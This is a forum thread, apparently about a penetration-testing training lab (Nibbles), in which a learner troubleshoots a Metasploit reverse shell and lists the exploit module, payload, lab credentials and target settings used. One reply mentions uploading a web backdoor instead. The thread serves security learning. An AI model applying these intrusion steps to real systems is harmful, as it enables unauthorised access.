Getting Started - Nibbles - Privilege Escalation

When I was trying to achieve the reverse shell using “Alternate User Method - Metasploit”, I encountered some weird error.

I even tried to copy the whole steps one by one, and it even gave me 90% of the similar output shown in the method, but I was not able to run any command in the Metasploit session. Here are the settings I used:

LHOSTS as my IP
RHOSTS as target IP
set username admin
set password nibbles
set TARGETURI nibbleblog
set payload generic/shell_reverse_tcp

And the exploit was exploit/multi/http/nibbleblog_file_upload

I was able to achieve the reverse TCP shell connection but was not able to navigate through the session, as none of the commands were responding. For example, I tried to cd /home/nibbler/ or cd ~ or cd /home.

I was only able to use the ls command, which was showing me the db.xml file, I think, which was located in the directory http:///nibbleblog/content/private/plugins/my_image/ on the server.

Does anyone have any leads?

For me, I did not use the Metasploit one; I did it manually by uploading a simple backdoor and running my commands in the web URL to get a shell.

@Tobii said:

For me, I did not use the Metasploit one; I did it manually by uploading a simple backdoor and running my commands in the web URL to get a shell.

Yes, I did apply that method, but I also wanted to check the alternate method. That's why I was asking, and you should also give it a try… :blush: and maybe correct me :smiley:

If you’re sure that the LHOST, LPORT and RHOST configuration is all correct, I suggest trying with different payloads: try show payloads, and set payload NUMBER, where NUMBER is the number of the payload shown in the list. Sometimes cycling the payloads is enough to get a working connection.

OK, I was able to gain access using Metasploit using my own Kali Virtual Box. I guess I was doing it right before, but I was bad at navigation, I guess, or there was something wrong, because when I used the same command earlier in Pwnbox to cd /home it was not showing any results, but now it was showing the nibbler dir…